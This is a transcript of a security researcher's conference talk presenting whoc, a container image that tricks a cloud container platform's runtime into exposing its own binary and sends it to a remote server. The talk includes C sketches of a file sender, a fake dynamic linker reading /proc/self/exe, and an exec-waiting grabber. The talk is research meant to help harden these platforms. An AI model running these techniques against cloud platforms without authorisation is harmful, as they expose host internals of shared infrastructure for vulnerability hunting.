Thanks, thanks everyone for joining. I'm Yuval Avrahami, a security researcher at Palo Alto Networks, where me and the rest of my team look into the security of the cloud, and containers specifically. I'm very excited today to be presenting whoc, a tool I wrote. It's actually a container image that can be used to look under the hood of container-as-a-service platforms.

Let's start off by going over the agenda. We'll start by talking about what container-as-a-service platforms are and why they're interesting. We'll then talk about whoc, what it does and how it does it. Then I'll show a quick demo, we'll go into the low-level details of the implementation, and finally I'll discuss some of the findings I was able to get with whoc and wrap it up with some questions.

So let's start with containers as a service. You've probably heard about some of the container-as-a-service platforms out there: AWS Fargate, Azure Container Instances, Google Cloud Run, and more recently IBM Code Engine. These platforms are really a way to run serverless containers. They let you take a container, just upload it to the cloud, and have it process events and scale up and down according to demand. It's really a way to run your services without managing or worrying about the underlying infrastructure, the underlying servers or nodes, which greatly improves ease of use. But on the other hand, without that management you have no visibility into how your containers run in the cloud. And that raises the question: can you really trust container-as-a-service platforms with your containers?

So what could be an issue? Well, a container-as-a-service platform, like every public cloud offering, runs your workloads alongside other customers' workloads. So you need to trust the platform to segregate your workloads from other customers' workloads, because there may be a malicious customer. But with container-as-a-service offerings you really have almost no visibility into how your containers run. You just upload your container image and get some HTTP endpoint, but beyond that you don't know how the cloud provider is protecting your workloads. And that's really what whoc tries to address.

So the motivation is to gain visibility into how container-as-a-service platforms run our containers. The way whoc does it: it's a container image that, upon execution, exfiltrates the underlying host's container runtime to a remote server. It actually sends the binary itself, and you might find that pretty interesting — a container that reads a file from the host, the container runtime. We'll get to how whoc does that in just a bit, but let's start off by seeing a demo.

So what I have here is a file server that will receive the runtime, and I'm going to use IBM Code Engine, which is a CaaS platform. First, I'm creating a job template, and it uses the whoc container image, as you can see. Now I'm going to deploy the whoc container to IBM Cloud and have it run in the container-as-a-service platform. This is a live demo, so hopefully it will work. OK, the container is now uploaded, and you can see that the file server received some file. We'll just wait — oh, it finished. If we take a look at the file we got, we can see that we got runc, which is the industry-standard container runtime. This is the version that is used in IBM Code Engine, and it's the actual binary — you can see it's a Go binary, so it's pretty large. So that's very, very cool, in my opinion at least.
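Just to give a feel for what happened on the wire there: that last step is essentially reading a file and streaming it to a listener. Here's a minimal sketch of such a sender in C — the raw TCP transport and the argument handling are my own simplifications for illustration, not whoc's actual uploader or the demo file server's protocol.

```c
/* send_file.c - minimal sketch: stream one file to a remote TCP listener.
 * Hypothetical illustration, not whoc's actual uploader. */
#include <arpa/inet.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <unistd.h>

int main(int argc, char **argv) {
    if (argc != 4) {
        fprintf(stderr, "usage: %s <file> <server-ip> <port>\n", argv[0]);
        return 1;
    }

    /* connect to the listener (like the file server in the demo) */
    int sock = socket(AF_INET, SOCK_STREAM, 0);
    struct sockaddr_in addr = {0};
    addr.sin_family = AF_INET;
    addr.sin_port = htons(atoi(argv[3]));
    inet_pton(AF_INET, argv[2], &addr.sin_addr);
    if (connect(sock, (struct sockaddr *)&addr, sizeof(addr)) < 0) {
        perror("connect");
        return 1;
    }

    /* stream the file (e.g. a grabbed runtime binary) chunk by chunk */
    int fd = open(argv[1], O_RDONLY);
    if (fd < 0) {
        perror("open");
        return 1;
    }
    char buf[4096];
    ssize_t n;
    while ((n = read(fd, buf, sizeof(buf))) > 0)
        write(sock, buf, (size_t)n);

    close(fd);
    close(sock);
    return 0;
}
```

You'd point something like that at any listener that writes whatever it receives to disk.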
Let's continue and talk about what we can expect to find with this tool, just before we talk about the implementation. Like we saw with IBM Code Engine, we can expect a lot of runc. runc is the industry-standard container runtime, so we can expect to see a lot of it. We might see some old and vulnerable runc versions, we might see custom changes a cloud provider made to vanilla runc, and we might even see other runtimes, maybe proprietary runtimes. You really can't know.

Let's continue to how whoc is implemented. whoc basically follows two steps. The first step is to trick the runtime into executing itself inside the container. The second step is to have someone in the container read the runtime binary from /proc/PID/exe and send it to a remote server. If that sounds a little complex right now, let's break it down step by step.

So the first step is to trick the runtime into executing itself inside the container. How do we do it? Well, it's pretty simple. This is the Dockerfile of the container image: all we do is set the entry point to /proc/self/exe. /proc/self/exe is a unique magic link in Linux: whatever process accesses that path sees a link to the binary it is running. You can see in the image below that when ls accesses /proc/self/exe, it sees that /proc/self/exe points to ls, but when the readlink binary accesses /proc/self/exe, it points to readlink. So when we tell the runtime to please execute /proc/self/exe as the container entry point, we actually make it execute itself inside our container.

So that's the first step: we have a way to trick the runtime into executing itself inside the container. The second step is to have someone in the container read that runtime process's /proc/PID/exe and send it to a remote server. That's how it looks: we have the runtime, we trick it into executing itself inside the container, then our process inside the container reads the runtime executable through /proc/<runtime PID>/exe and sends it to our remote server.

Except it's actually not that simple, because containers only have one entry point — they're made to run one process. So if we set the entry point to /proc/self/exe and make the runtime execute itself inside the container, we really have no way to spawn our own process that is supposed to send the runtime — the reader process in this image. So how can we overcome this?

Well, the solution is to replace the dynamic linker inside the container image. We assume the runtime is dynamically linked. In Linux, when a dynamically linked executable starts running, the kernel loads the dynamic linker into the process memory of that executable and transfers execution to it, so the dynamic linker can load the libraries the process needs. The kernel searches for the dynamic linker in the root filesystem of the process, and because we tricked the runtime into running inside our container, it will actually take the container's dynamic linker. To make this happen we only add one line to the Dockerfile — the second line here — which takes a fake dynamic linker we created and replaces the container's dynamic linker with it.
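To make that a little more concrete, here's roughly the idea behind such a fake "linker", as a minimal C sketch under my own assumptions — an illustration, not whoc's actual code. Once the kernel loads it inside the runtime's process, /proc/self/exe there resolves to the container runtime's binary on the host:

```c
/* fake_ld.c - sketch of the idea behind the replaced "dynamic linker".
 * It has to be statically linked, since it runs before any libraries can be
 * loaded. Illustration only, not whoc's actual fake linker.
 * When loaded inside the runtime's process, /proc/self/exe resolves to the
 * container runtime's binary on the host. */
#include <fcntl.h>
#include <limits.h>
#include <stdio.h>
#include <sys/stat.h>
#include <unistd.h>

int main(void) {
    char target[PATH_MAX];
    ssize_t len = readlink("/proc/self/exe", target, sizeof(target) - 1);
    if (len > 0) {
        target[len] = '\0';
        printf("running as: %s\n", target);  /* inside the runtime: the runtime's path */
    }

    int fd = open("/proc/self/exe", O_RDONLY);  /* the runtime binary itself */
    struct stat st;
    if (fd >= 0 && fstat(fd, &st) == 0)
        printf("binary is %lld bytes\n", (long long)st.st_size);
    /* from here, read fd in chunks and ship it out, like the sender sketched earlier */
    return 0;
}
```

From that open file descriptor it's just a matter of reading the binary in chunks and sending it out, like the sender sketched earlier.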
So that's actually a pretty nice trick, but we need a way to actually create a dynamic linker, and when I approached this task I really had no idea how to do that. As we've said, the kernel loads the dynamic linker into process memory so it can load shared libraries. So first of all, the dynamic linker must be statically linked: it cannot have dependencies on other libraries, because the dynamic linker is the one responsible for loading libraries. Second of all, it needs to be written in C, or maybe C++ — I haven't tried C++ — because languages with complex runtimes, like Go, don't expect to run in the context in which the dynamic linker runs, so they can cause some issues. On my first try I compiled it against glibc, and it turns out a glibc feature called thread-local storage causes some problems, but if you compile against musl libc, everything works fine. So that's how I created my custom dynamic linker.

To wrap things up, that's how the demo we saw worked: IBM Cloud took our whoc image, the entry point was set to /proc/self/exe, and when the container was run, our fake dynamic linker was loaded into the runtime process and sent the runtime binary to our remote server.

So we have a way to read the container runtime binary from the host, but there's also an assumption here, which is that the runtime is dynamically linked — because if the runtime is statically linked, the linker isn't loaded into memory at all, since it isn't needed. In that scenario, we need some other way to have someone in the container read the runtime and send it to us. I gave this some thought, and eventually the solution I came up with is to read the runtime whenever there is an exec — like a docker exec or kubectl exec, if you're familiar with those. Whenever there's an exec into the whoc container, this flavor of whoc will send the runtime, and most container-as-a-service platforms support a docker exec-like experience into the uploaded container.

If it's not really clear yet, let's look at the Dockerfile. We now have our own binary run as the entry point — a binary that knows how to upload the runtime. When we run the container, that's what you have: just a process running inside the whoc container. Then, when someone does a docker exec into the container, we ask it to exec /proc/self/exe, which makes the runtime process appear inside the container — we trick it into executing itself inside the container. Our upload_runtime process, which runs as PID 1, waits for the runtime to jump in, and whenever it does, it sends it to the remote server.
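Here's roughly what that PID 1 waiter could look like — a minimal sketch with my own simplifications: it just polls /proc and copies the binary to a local file, whereas whoc's actual upload_runtime presumably detects the exec in its own way and sends the file to the remote server.

```c
/* wait_for_exec.c - minimal sketch of a PID-1 "wait for exec" waiter.
 * Polls /proc until a second process appears in the container's PID namespace
 * (the runtime exec'ing /proc/self/exe into us), then copies that process's
 * binary out through /proc/<pid>/exe. Polling, the output path, and the local
 * copy (instead of an upload) are illustrative assumptions, not whoc's code. */
#include <dirent.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

static void copy_fd(int in, int out) {
    char buf[4096];
    ssize_t n;
    while ((n = read(in, buf, sizeof(buf))) > 0)
        write(out, buf, (size_t)n);
}

int main(void) {
    for (;;) {
        DIR *proc = opendir("/proc");
        struct dirent *e;
        while (proc && (e = readdir(proc)) != NULL) {
            int pid = atoi(e->d_name);
            if (pid <= 1)
                continue;                        /* skip non-PID entries and ourselves (PID 1) */
            char path[64];
            snprintf(path, sizeof(path), "/proc/%d/exe", pid);
            int in = open(path, O_RDONLY);       /* the runtime's own binary */
            if (in < 0)
                continue;
            int out = open("/tmp/runtime", O_WRONLY | O_CREAT | O_TRUNC, 0644);
            copy_fd(in, out);                    /* a real tool would send this to the server */
            printf("grabbed runtime from %s\n", path);
            close(in); close(out); closedir(proc);
            return 0;
        }
        if (proc) closedir(proc);
        usleep(100 * 1000);                      /* nothing yet, keep waiting */
    }
}
```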
So let's see a demo. First off, we need a file server. And because the file server runs on our local machine, we need to see how a Docker container sees the IP of the local machine — that's really the IP of the default gateway, so I'm just going to grab that. Now we're going to run our container with the IP we grabbed earlier, the host's IP from the container's point of view. You can see this is the wait-for-exec flavor of whoc: whoc now runs as PID 1 of the container and waits for the runtime to exec in. So that's what we're going to do — and the name of the container is... oops, sorry. We're going to exec /proc/self/exe inside it, and you can see that whoc noticed the runtime executing into the container and uploaded the runtime over here to the file server. If we look at the file we got, we can see that again it's the runtime of the underlying host, which on my Linux VM is also runc. So that's how I solved statically linked runtimes: by having a process in the container wait for a docker exec into the container.

And that's really how whoc is implemented. You have this flavor for statically linked runtimes, and you have the dynamic linker flavor for dynamically linked runtimes. When I took whoc to real container-as-a-service platforms, I actually saw both: I saw a dynamically linked runtime and I also saw a statically linked runtime.

So with that, let's talk about the findings so far. As I expected at the beginning, I saw a lot of runc, which really is the industry-standard container runtime. But I also saw old and vulnerable runc versions, which led to some quite interesting research that I can't disclose yet. What about custom changes to vanilla runc? Well, I really haven't had the time to take a deeper look into that; from my fairly shallow look I didn't see any custom changes, but I haven't looked into it fully because I was more preoccupied with the vulnerable runc versions. And finally, I didn't see any runtime other than runc.

So what's next? Well, you can use whoc to poke at the underlying container runtime of whatever container-as-a-service platform you like. You can get visibility into how your containers run on the platform, and maybe you'll find some security issue with the runtime, possibly get a bounty, and help harden container-as-a-service platforms. Right after this talk, I'm going to make whoc publicly accessible, and I think I'm ready for questions.